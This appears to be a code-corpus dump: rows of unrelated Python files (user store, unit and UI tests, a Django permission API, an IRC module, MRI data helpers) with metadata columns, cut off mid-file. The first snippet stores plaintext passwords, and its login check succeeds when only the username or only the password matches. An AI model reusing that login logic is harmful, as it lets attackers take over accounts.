# check validity of data
if self.validate_details(details) is True:
users.append({
"user_id": user_id,
"email": self.email,
"username": self.username,
"password": self.password,
"role": self.role
})
user_id += 1
return "User added Successfully!"
return "Ensure that the details are relevant before adding a user!"
def get_users(self):
"""get all users"""
if not users:
return "There are no users registered!"
return users
def get_one_user(self, user_id):
"""fetch a specific user"""
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
return users[user]
def validate_user(self, details):
"""validate user details while loging in"""
if not details:
return "Please enter data for registration"
if not users:
return "No registered users"
for user in range(len(users)):
if users[user]['username'] != details["username"] and users[user]['password'] != details["password"]:
continue
return "Login Successful!"
def edit_user_role(self, user_id, role):
"""Admin changes attendant role to admin"""
if not users:
return "No registered users"
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
user["role"] = "administrator"
return "Attendant was promoted to admin" | en | 0.702576 | users data structures defining global variables initializing user constructor checks if the user details are relevant before registering #if bool(re.search(r'@', details["email"])) is False: #return "Your email should have an @ in it" registering a new user # global variable # check details for data # check validity of data get all users fetch a specific user validate user details while loging in Admin changes attendant role to admin | 3.960313 | 4 |
tigerforecast/tests/test_tigerforecast_functionality.py | danielsuo/TigerForecast | 1 | 6616806 | """
Run all tests for the TigerForecast framework
"""
import tigerforecast
# test all tigerforecast.* methods
def test_tigerforecast_functionality(show_results=False):
print("\nrunning all tigerforecast functionality tests...\n")
test_help()
test_error()
print("\nall tigerforecast functionality tests passed\n")
# test tigerforecast.help() method
def test_help():
tigerforecast.help()
def test_error():
try:
from tigerforecast.error import Error
raise Error()
except Error:
pass
if __name__ == "__main__":
test_tigerforecast_functionality(show_results=False) | """
Run all tests for the TigerForecast framework
"""
import tigerforecast
# test all tigerforecast.* methods
def test_tigerforecast_functionality(show_results=False):
print("\nrunning all tigerforecast functionality tests...\n")
test_help()
test_error()
print("\nall tigerforecast functionality tests passed\n")
# test tigerforecast.help() method
def test_help():
tigerforecast.help()
def test_error():
try:
from tigerforecast.error import Error
raise Error()
except Error:
pass
if __name__ == "__main__":
test_tigerforecast_functionality(show_results=False) | en | 0.648065 | Run all tests for the TigerForecast framework # test all tigerforecast.* methods # test tigerforecast.help() method | 2.400997 | 2 |
tests/core/test_ops_pool.py | thirionjl/chains | 2 | 6616807 | import numpy as np
import pytest
from chains.core.ops_pooling import MaxPool
from chains.core.static_shape import StaticShape, Dim
from chains.core.utils_conv import TensorFlowNHWC
def test_valid_shape_and_stride():
pool = MaxPool(stride=2)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
pool.check_incoming_shapes(features)
out_shape = pool.compute_out_shape(features)
assert out_shape == StaticShape(m, 3, 20, 15)
def test_invalid_shape_and_stride():
pool = MaxPool(stride=3)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
with pytest.raises(ValueError) as ex:
pool.check_incoming_shapes(features)
assert str(
ex.value) == "Height (40) should be a multiple of stride 3 but is not"
def test_compute_max_pool():
pool = MaxPool(stride=2)
features = np.arange(2 * 3 * 4 * 4, dtype=np.float32).reshape(2, 3, 4, 4)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
assert actual.shape == (2, 3, 2, 2)
e1 = np.array([5, 7, 13, 15, 21, 23, 29, 31, 37, 39, 45, 47]) \
.reshape(3, 2, 2).astype(np.float32)
expected = np.stack([e1, e1 + 48], axis=0)
assert expected.shape == (2, 3, 2, 2)
np.testing.assert_allclose(actual, expected)
d_features, = pool.partials(np.ones(actual.shape))
assert d_features.shape == features.shape
row1 = [0, 0, 0, 0]
row2 = [0, 1, 0, 1]
channel = np.stack([row1, row2, row1, row2], axis=0)
sample = np.stack([channel, channel, channel], axis=0)
expected_partial = np.stack([sample, sample], axis=0)
np.testing.assert_allclose(d_features, expected_partial)
def test_compute_max_pool_with_other_format():
pool = MaxPool(stride=2, conv_format=TensorFlowNHWC)
features = np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
np.testing.assert_allclose(actual, np.array([[[[15., 16., 17.],
[21., 22., 23.]],
[[39., 40., 41.],
[45., 46., 47.]]],
[[[63., 64., 65.],
[69., 70., 71.]],
[[87., 88., 89.],
[93., 94., 95.]]]],
dtype=np.float32))
d_features, = pool.partials(np.ones(actual.shape))
np.testing.assert_allclose(d_features, np.array([[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]],
[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]]],
dtype=np.float32))
def _sample_pool2d_strided():
import tensorflow as tf
features = tf.Variable(
np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3))
conv = tf.nn.max_pool(value=features, ksize=(1, 2, 2, 1), padding="VALID",
strides=(1, 2, 2, 1))
gd = tf.train.GradientDescentOptimizer(learning_rate=0.1)
grads_and_vars = gd.compute_gradients(conv)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
c = sess.run(conv)
g = sess.run(grads_and_vars)
print("Activations = ", repr(c))
print("dFeatures = ", repr(g[0][0]))
| import numpy as np
import pytest
from chains.core.ops_pooling import MaxPool
from chains.core.static_shape import StaticShape, Dim
from chains.core.utils_conv import TensorFlowNHWC
def test_valid_shape_and_stride():
pool = MaxPool(stride=2)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
pool.check_incoming_shapes(features)
out_shape = pool.compute_out_shape(features)
assert out_shape == StaticShape(m, 3, 20, 15)
def test_invalid_shape_and_stride():
pool = MaxPool(stride=3)
m = Dim.unknown()
features = StaticShape(m, 3, 40, 30)
with pytest.raises(ValueError) as ex:
pool.check_incoming_shapes(features)
assert str(
ex.value) == "Height (40) should be a multiple of stride 3 but is not"
def test_compute_max_pool():
pool = MaxPool(stride=2)
features = np.arange(2 * 3 * 4 * 4, dtype=np.float32).reshape(2, 3, 4, 4)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
assert actual.shape == (2, 3, 2, 2)
e1 = np.array([5, 7, 13, 15, 21, 23, 29, 31, 37, 39, 45, 47]) \
.reshape(3, 2, 2).astype(np.float32)
expected = np.stack([e1, e1 + 48], axis=0)
assert expected.shape == (2, 3, 2, 2)
np.testing.assert_allclose(actual, expected)
d_features, = pool.partials(np.ones(actual.shape))
assert d_features.shape == features.shape
row1 = [0, 0, 0, 0]
row2 = [0, 1, 0, 1]
channel = np.stack([row1, row2, row1, row2], axis=0)
sample = np.stack([channel, channel, channel], axis=0)
expected_partial = np.stack([sample, sample], axis=0)
np.testing.assert_allclose(d_features, expected_partial)
def test_compute_max_pool_with_other_format():
pool = MaxPool(stride=2, conv_format=TensorFlowNHWC)
features = np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3)
pool.check_incoming_shapes(StaticShape.of_tensor(features))
pool.compute(features)
actual = pool.output
np.testing.assert_allclose(actual, np.array([[[[15., 16., 17.],
[21., 22., 23.]],
[[39., 40., 41.],
[45., 46., 47.]]],
[[[63., 64., 65.],
[69., 70., 71.]],
[[87., 88., 89.],
[93., 94., 95.]]]],
dtype=np.float32))
d_features, = pool.partials(np.ones(actual.shape))
np.testing.assert_allclose(d_features, np.array([[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]],
[[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[1., 1., 1.],
[0., 0., 0.],
[1., 1., 1.]]]],
dtype=np.float32))
def _sample_pool2d_strided():
import tensorflow as tf
features = tf.Variable(
np.arange(2 * 4 * 4 * 3, dtype=np.float32).reshape(2, 4, 4, 3))
conv = tf.nn.max_pool(value=features, ksize=(1, 2, 2, 1), padding="VALID",
strides=(1, 2, 2, 1))
gd = tf.train.GradientDescentOptimizer(learning_rate=0.1)
grads_and_vars = gd.compute_gradients(conv)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
c = sess.run(conv)
g = sess.run(grads_and_vars)
print("Activations = ", repr(c))
print("dFeatures = ", repr(g[0][0]))
| none | 1 | 2.294283 | 2 | |
learn-to-code-with-python/18-Dictionaries-Iteration/lists-of-dictionaries.py | MaciejZurek/python_practicing | 0 | 6616808 | <reponame>MaciejZurek/python_practicing
concert_attendees = [
{"name": "Taylor", "section": 400, "price paid": 99.99},
{"name": "Cristina", "section": 200, "price paid": 149.99},
{"name": "Jeremy", "section": 100, "price paid": 0.0}
]
for attendee in concert_attendees:
for key, value in attendee.items():
print(f"The {key} is {value}.")
| concert_attendees = [
{"name": "Taylor", "section": 400, "price paid": 99.99},
{"name": "Cristina", "section": 200, "price paid": 149.99},
{"name": "Jeremy", "section": 100, "price paid": 0.0}
]
for attendee in concert_attendees:
for key, value in attendee.items():
print(f"The {key} is {value}.") | none | 1 | 3.434949 | 3 | |
data/objects/bank.py | vuphan314/justicia | 2 | 6616809 | <reponame>vuphan314/justicia
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from justicia import utils
import os
class Bank():
def __init__(self, verbose = True, config = 0):
self.name = "bank"
self.filename = os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv"
if(config == 0):
self.known_sensitive_attributes = ['age', 'marital']
elif(config == 1):
self.known_sensitive_attributes = ['age']
elif(config == 2):
self.known_sensitive_attributes = ['marital']
else:
raise ValueError(str(config)+ " is not a valid configuration for sensitive groups")
self.config = config
self.categorical_attributes = ['job', 'marital', 'education', 'default', 'housing', 'loan', 'contact', 'month', 'day_of_week', 'poutcome', 'y']
self.continuous_attributes = ['age','duration', 'campaign', 'pdays', 'previous', 'emp.var.rate', 'cons.price.idx', 'cons.conf.idx', 'euribor3m', 'nr.employed']
self.verbose = verbose
def get_df(self, repaired = False):
df = pd.read_csv(os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv", sep=";")
df.rename(columns={'y':'target'}, inplace=True)
assert len(self.categorical_attributes) + len(self.continuous_attributes) == len(df.columns), "Error in classifying columns:" + str(len(self.categorical_attributes) + len(self.continuous_attributes)) + " " + str(len(df.columns))
# scale
scaler = MinMaxScaler()
df[self.continuous_attributes] = scaler.fit_transform(df[self.continuous_attributes])
self.keep_columns = list(df.columns)
for known_sensitive_attribute in self.known_sensitive_attributes:
if(known_sensitive_attribute in self.continuous_attributes):
df = utils.get_discretized_df(df, columns_to_discretize=[known_sensitive_attribute])
df = utils.get_one_hot_encoded_df(df, [known_sensitive_attribute])
self.continuous_attributes.remove(known_sensitive_attribute)
if(self.verbose):
print("-number of samples: (before dropping nan rows)", len(df))
# drop rows with null values
df = df.dropna()
if(self.verbose):
print("-number of samples: (after dropping nan rows)", len(df))
return df
| import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from justicia import utils
import os
class Bank():
def __init__(self, verbose = True, config = 0):
self.name = "bank"
self.filename = os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv"
if(config == 0):
self.known_sensitive_attributes = ['age', 'marital']
elif(config == 1):
self.known_sensitive_attributes = ['age']
elif(config == 2):
self.known_sensitive_attributes = ['marital']
else:
raise ValueError(str(config)+ " is not a valid configuration for sensitive groups")
self.config = config
self.categorical_attributes = ['job', 'marital', 'education', 'default', 'housing', 'loan', 'contact', 'month', 'day_of_week', 'poutcome', 'y']
self.continuous_attributes = ['age','duration', 'campaign', 'pdays', 'previous', 'emp.var.rate', 'cons.price.idx', 'cons.conf.idx', 'euribor3m', 'nr.employed']
self.verbose = verbose
def get_df(self, repaired = False):
df = pd.read_csv(os.path.dirname(os.path.realpath(__file__)) + "/../raw/bank-additional-full.csv", sep=";")
df.rename(columns={'y':'target'}, inplace=True)
assert len(self.categorical_attributes) + len(self.continuous_attributes) == len(df.columns), "Error in classifying columns:" + str(len(self.categorical_attributes) + len(self.continuous_attributes)) + " " + str(len(df.columns))
# scale
scaler = MinMaxScaler()
df[self.continuous_attributes] = scaler.fit_transform(df[self.continuous_attributes])
self.keep_columns = list(df.columns)
for known_sensitive_attribute in self.known_sensitive_attributes:
if(known_sensitive_attribute in self.continuous_attributes):
df = utils.get_discretized_df(df, columns_to_discretize=[known_sensitive_attribute])
df = utils.get_one_hot_encoded_df(df, [known_sensitive_attribute])
self.continuous_attributes.remove(known_sensitive_attribute)
if(self.verbose):
print("-number of samples: (before dropping nan rows)", len(df))
# drop rows with null values
df = df.dropna()
if(self.verbose):
print("-number of samples: (after dropping nan rows)", len(df))
return df | en | 0.258763 | # scale # drop rows with null values | 3.018614 | 3 |
Protheus_WebApp/Modules/SIGAGTP/GTPA422TestCase.py | 98llm/tir-script-samples | 17 | 6616810 | <reponame>98llm/tir-script-samples<filename>Protheus_WebApp/Modules/SIGAGTP/GTPA422TestCase.py
from tir import Webapp
import unittest
import time
class GTPA422(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGAGTP', '27/08/2020', 'T1', 'D MG 01 ', '88')
inst.oHelper.Program('GTPA422')
def test_GTPA422_CT001(self):
print("test_GTPA422_CT001 - Visualizar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Visualizar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT002(self):
print("test_GTPA422_CT002 - Alterar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Alterar')
self.oHelper.SetValue('Motivo', 'Alteração Tir')
self.oHelper.SetButton('Confirmar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT003(self):
print("test_GTPA422_CT003 - Excluir")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Outras Ações', 'Excluir')
self.oHelper.SetButton('Confirmar')
time.sleep(2)
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT004(self):
print("test_GTPA422_CT004 - Incluir")
self.oHelper.SetButton('Incluir')
self.oHelper.SetBranch('D MG')
self.oHelper.SetValue('Tipo', '000001')
self.oHelper.SetValue('Agência', 'GTPVAM')
self.oHelper.F3(field='Serie')
self.oHelper.SearchBrowse('000046', key=1, index=True)
self.oHelper.SetButton('OK')
self.oHelper.SetValue('Seq. Lote', '000012')
self.oHelper.SetValue('Dt. Entrega', '31/08/2020')
self.oHelper.SetValue('Emitente' , '000001')
self.oHelper.SetValue('Cod.Acertado' , '000009')
self.oHelper.SetButton('Outras Ações', 'Carrega Bilhete')
self.oHelper.SetValue('Dt. Emissão de: ?' , '27/08/2020')
self.oHelper.SetValue('Dt Emissão até: ?' , '31/08/2020')
self.oHelper.SetValue('Tipo de Documento: ?' , '000001')
self.oHelper.SetValue('Série: ?' , '422')
self.oHelper.SetValue('Sub Série: ?' , '111')
self.oHelper.SetValue('Num. Complemento: ?' , '111')
self.oHelper.SetValue('Numero Inicial: ?' , '000001')
self.oHelper.SetValue('Numero Final: ?' , '000100')
self.oHelper.SetButton('OK')
time.sleep(3)
self.oHelper.SetButton('Confirmar')
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main()
| from tir import Webapp
import unittest
import time
class GTPA422(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGAGTP', '27/08/2020', 'T1', 'D MG 01 ', '88')
inst.oHelper.Program('GTPA422')
def test_GTPA422_CT001(self):
print("test_GTPA422_CT001 - Visualizar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Visualizar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT002(self):
print("test_GTPA422_CT002 - Alterar")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Alterar')
self.oHelper.SetValue('Motivo', 'Alteração Tir')
self.oHelper.SetButton('Confirmar')
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT003(self):
print("test_GTPA422_CT003 - Excluir")
self.oHelper.SearchBrowse('D MG 000003', key=1, index=True)
self.oHelper.SetButton('Outras Ações', 'Excluir')
self.oHelper.SetButton('Confirmar')
time.sleep(2)
self.oHelper.SetButton('Fechar')
self.oHelper.AssertTrue()
def test_GTPA422_CT004(self):
print("test_GTPA422_CT004 - Incluir")
self.oHelper.SetButton('Incluir')
self.oHelper.SetBranch('D MG')
self.oHelper.SetValue('Tipo', '000001')
self.oHelper.SetValue('Agência', 'GTPVAM')
self.oHelper.F3(field='Serie')
self.oHelper.SearchBrowse('000046', key=1, index=True)
self.oHelper.SetButton('OK')
self.oHelper.SetValue('Seq. Lote', '000012')
self.oHelper.SetValue('Dt. Entrega', '31/08/2020')
self.oHelper.SetValue('Emitente' , '000001')
self.oHelper.SetValue('Cod.Acertado' , '000009')
self.oHelper.SetButton('Outras Ações', 'Carrega Bilhete')
self.oHelper.SetValue('Dt. Emissão de: ?' , '27/08/2020')
self.oHelper.SetValue('Dt Emissão até: ?' , '31/08/2020')
self.oHelper.SetValue('Tipo de Documento: ?' , '000001')
self.oHelper.SetValue('Série: ?' , '422')
self.oHelper.SetValue('Sub Série: ?' , '111')
self.oHelper.SetValue('Num. Complemento: ?' , '111')
self.oHelper.SetValue('Numero Inicial: ?' , '000001')
self.oHelper.SetValue('Numero Final: ?' , '000100')
self.oHelper.SetButton('OK')
time.sleep(3)
self.oHelper.SetButton('Confirmar')
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == '__main__':
unittest.main() | none | 1 | 2.602334 | 3 | |
core/api/permissions/viewsets.py | geovaniGomes/api_users | 0 | 6616811 | <reponame>geovaniGomes/api_users
from rest_framework.viewsets import ModelViewSet
from rest_framework.response import Response
from rest_framework import status
from core.models import Permission, Group
from .serializers import PermissionSerializer
from django.shortcuts import get_object_or_404
def is_permission(permission, pk=None):
data = {}
if pk:
exist = Permission.objects.filter(code_name=permission['code_name']).exclude(id__in=[pk]).exists()
else:
exist = Permission.objects.filter(code_name=permission['code_name']).exists()
if exist:
data = {"detail": "permission already registered."}
return data
return data
def is_group(groups):
for group in groups:
get_object_or_404(Group, name=group['name'], is_deleted=False)
class PermissionViewSet(ModelViewSet):
queryset = Permission.objects.all()
serializer_class = PermissionSerializer
def create(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission)
if not data:
groups = request.data.get('groups')
if groups is not None and groups != []:
is_group(groups)
serializer = self.serializer_class(data=permission)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission, kwargs.get('pk'))
if not data:
partial = kwargs.pop('partial', False)
instance = self.get_object()
groups = request.data.get('groups')
if groups is not None and groups != []:
is_group(groups, kwargs['pk'])
serializer = self.serializer_class(instance, data=permission, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return Response(serializer.data)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
pk = kwargs['pk']
permission = get_object_or_404(Permission, id=pk)
permission.inactivate()
return Response(status=status.HTTP_204_NO_CONTENT)
| from rest_framework.viewsets import ModelViewSet
from rest_framework.response import Response
from rest_framework import status
from core.models import Permission, Group
from .serializers import PermissionSerializer
from django.shortcuts import get_object_or_404
def is_permission(permission, pk=None):
data = {}
if pk:
exist = Permission.objects.filter(code_name=permission['code_name']).exclude(id__in=[pk]).exists()
else:
exist = Permission.objects.filter(code_name=permission['code_name']).exists()
if exist:
data = {"detail": "permission already registered."}
return data
return data
def is_group(groups):
for group in groups:
get_object_or_404(Group, name=group['name'], is_deleted=False)
class PermissionViewSet(ModelViewSet):
queryset = Permission.objects.all()
serializer_class = PermissionSerializer
def create(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission)
if not data:
groups = request.data.get('groups')
if groups is not None and groups != []:
is_group(groups)
serializer = self.serializer_class(data=permission)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
if len(request.data) == 0:
response = {
"name": "This field may not be blank.",
"code_name": "This field may not be blank."
}
return Response(response, status=status.HTTP_400_BAD_REQUEST)
permission = request.data
data = is_permission(permission, kwargs.get('pk'))
if not data:
partial = kwargs.pop('partial', False)
instance = self.get_object()
groups = request.data.get('groups')
if groups is not None and groups != []:
is_group(groups, kwargs['pk'])
serializer = self.serializer_class(instance, data=permission, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return Response(serializer.data)
else:
return Response(data, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
pk = kwargs['pk']
permission = get_object_or_404(Permission, id=pk)
permission.inactivate()
return Response(status=status.HTTP_204_NO_CONTENT) | none | 1 | 2.035597 | 2 | |
txircd/modules/ircv3_away-notify.py | DesertBus/txircd | 4 | 6616812 | <filename>txircd/modules/ircv3_away-notify.py
from txircd.modbase import Module
class AwayNotify(Module):
def capRequest(self, user, capability):
return True
def capAcknowledge(self, user, capability):
return False
def capRequestRemove(self, user, capability):
return True
def capAcknowledgeRemove(self, user, capability):
return False
def capClear(self, user, capability):
return True
def notifyUsers(self, user, namespace, key, oldValue, value):
try:
if not (namespace == "ext" and key == "away"):
return
message = value
if "away" not in user.metadata["ext"]:
message = None
notify = set()
for channel in self.ircd.channels.itervalues():
if user in channel.users:
for u in channel.users.iterkeys():
notify.add(u)
notify.remove(user)
for u in notify:
if "cap" in u.cache and "away-notify" in u.cache["cap"]:
if message is None:
u.sendMessage("AWAY", to=None, prefix=user.prefix())
else:
u.sendMessage("AWAY", ":{}".format(message), to=None, prefix=user.prefix())
except:
pass
def notifyOnJoin(self, user, channel):
if "away" in user.metadata["ext"]:
for u in channel.users.iterkeys():
if u != user and u.server == self.ircd.name and "cap" in u.cache and "away-notify" in u.cache["cap"]:
u.sendMessage("AWAY", ":{}".format(user.metadata["ext"]["away"]), to=None, prefix=user.prefix())
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
self.away_notify = None
def spawn(self):
self.away_notify = AwayNotify().hook(self.ircd)
if "cap" not in self.ircd.module_data_cache:
self.ircd.module_data_cache["cap"] = {}
self.ircd.module_data_cache["cap"]["away-notify"] = self.away_notify
return {
"actions": {
"join": self.away_notify.notifyOnJoin,
"metadataupdate": self.away_notify.notifyUsers
}
}
def cleanup(self):
del self.ircd.module_data_cache["cap"]["away-notify"] | <filename>txircd/modules/ircv3_away-notify.py
from txircd.modbase import Module
class AwayNotify(Module):
def capRequest(self, user, capability):
return True
def capAcknowledge(self, user, capability):
return False
def capRequestRemove(self, user, capability):
return True
def capAcknowledgeRemove(self, user, capability):
return False
def capClear(self, user, capability):
return True
def notifyUsers(self, user, namespace, key, oldValue, value):
try:
if not (namespace == "ext" and key == "away"):
return
message = value
if "away" not in user.metadata["ext"]:
message = None
notify = set()
for channel in self.ircd.channels.itervalues():
if user in channel.users:
for u in channel.users.iterkeys():
notify.add(u)
notify.remove(user)
for u in notify:
if "cap" in u.cache and "away-notify" in u.cache["cap"]:
if message is None:
u.sendMessage("AWAY", to=None, prefix=user.prefix())
else:
u.sendMessage("AWAY", ":{}".format(message), to=None, prefix=user.prefix())
except:
pass
def notifyOnJoin(self, user, channel):
if "away" in user.metadata["ext"]:
for u in channel.users.iterkeys():
if u != user and u.server == self.ircd.name and "cap" in u.cache and "away-notify" in u.cache["cap"]:
u.sendMessage("AWAY", ":{}".format(user.metadata["ext"]["away"]), to=None, prefix=user.prefix())
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
self.away_notify = None
def spawn(self):
self.away_notify = AwayNotify().hook(self.ircd)
if "cap" not in self.ircd.module_data_cache:
self.ircd.module_data_cache["cap"] = {}
self.ircd.module_data_cache["cap"]["away-notify"] = self.away_notify
return {
"actions": {
"join": self.away_notify.notifyOnJoin,
"metadataupdate": self.away_notify.notifyUsers
}
}
def cleanup(self):
del self.ircd.module_data_cache["cap"]["away-notify"] | none | 1 | 2.107269 | 2 | |
tests/test_plot_variant_type_data.py | burkesquires/ombre | 1 | 6616813 | from unittest import TestCase
class TestPlotVariantTypeData(TestCase):
def test_plot_variant_type_data(self):
self.fail()
| from unittest import TestCase
class TestPlotVariantTypeData(TestCase):
def test_plot_variant_type_data(self):
self.fail()
| none | 1 | 1.899336 | 2 | |
tutorial1_data_driven_reg_methods/utils/helper_funcs.py | ckolbPTB/TES_21_22_Tutorials | 2 | 6616814 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A collection of auxiliary functions for manipulating data.
"""
import numpy as np
import torch
from numpy.lib.stride_tricks import as_strided
from numpy.fft import ifftshift
import sys
sys.path.append('../')
def random_phase(img):
"""
function for generating a random phase-profile
"""
#get shape of in-plane image
Nx,Ny = img.shape[:2]
x = np.linspace(-np.pi, np.pi, Nx)
y = np.linspace(-np.pi, np.pi, Ny)
#generate parameters to create a random phase profile with values
xx, yy = np.meshgrid(x, y)
a, b,c,d,e = np.random.random(5)
z = a*np.sin(b*xx-c) + (1-a)*np.cos(d*yy-e)
#bring to [-np.pi, np.pi]
z = (np.pi- (-np.pi))*(z-np.min(z))/(np.max(z)-np.min(z)) + (-np.pi)
return z
def cplx_np2torch(x,dim):
"""
functon for converting a complex-valued np.array x
to a complex-valued torch-tensor, where the 2 channels
for the real and imaginary parts are inserted as "dim" dimension
"""
x = torch.stack([torch.tensor(np.real(x)),torch.tensor(np.imag(x))],dim=dim)
return x
def cplx_torch2np(x,dim):
"""
functon for converting a complex-valued torch-tensors to a complex-valued numpy array
the parameter "dim" indicates which dimension is used to stre the real
and the imaginary part in the torch-tensor
first, the tensor is transposed, such that we can access te real and the imaginry parts
the output is a complex-valued numpy array where the dimension "dim" is dropped
"""
#permutes the axis "dim" and 0
#now, the 0-th axis contains the real and imainary parts
x = torch.transpose(x,dim,0)
if x.is_cuda:
x = x.cpu()
#get the real and imaginry parts
xr = x[0,...].numpy()
xi = x[1,...].numpy()
x = xr+1j*xi
#expand dimensions in order to be able to get back to original shape
x = np.expand_dims(x,axis=0)
x = np.swapaxes(x,0,dim)
#drop the dimension "dim"
x = np.squeeze(x,axis=dim)
return x
def random_mask(img, acc_factor=4):
"""
function for generating a random binary massk.
For each time point, the mask is different for incoherent undersampling.
"""
def normal_pdf(length, sensitivity):
return np.exp(-sensitivity * (np.arange(length) - length / 2)**2)
def cartesian_mask(shape, acc, sample_n=10):
"""
Sampling density estimated from implementation of kt FOCUSS
shape: tuple - of form (..., nx, ny)
acc: float - doesn't have to be integer 4, 8, etc..
Note:
function borrowed from <NAME> from
https://github.com/js3611/Deep-MRI-Reconstruction/blob/master/utils/compressed_sensing.py
"""
N, Nx, Ny = int(np.prod(shape[:-2])), shape[-2], shape[-1]
pdf_x = normal_pdf(Nx, 0.5/(Nx/10.)**2)
lmda = Nx/(2.*acc)
n_lines = int(Nx / acc)
# add uniform distribution
pdf_x += lmda * 1./Nx
if sample_n:
pdf_x[Nx//2-sample_n//2:Nx//2+sample_n//2] = 0
pdf_x /= np.sum(pdf_x)
n_lines -= sample_n
mask = np.zeros((N, Nx))
for i in range(N):
idx = np.random.choice(Nx, n_lines, False, pdf_x)
mask[i, idx] = 1
if sample_n:
mask[:, Nx//2-sample_n//2:Nx//2+sample_n//2] = 1
size = mask.itemsize
mask = as_strided(mask, (N, Nx, Ny), (size * Nx, size, 0))
mask = mask.reshape(shape)
return mask
def cine_cartesian_mask(shape,acc_factor,mode='numpy'):
"""
create a binary mask for a 2d cine MR image sequence:
N.B. for numpy, the binary mask is only real-valued, but this suffices
as when computing the product of a complex-valued array with a ral-valued
one, the output is complex-valued. This is because, for \mathbb{C}, the one-element
is given by 1=1+0*j.
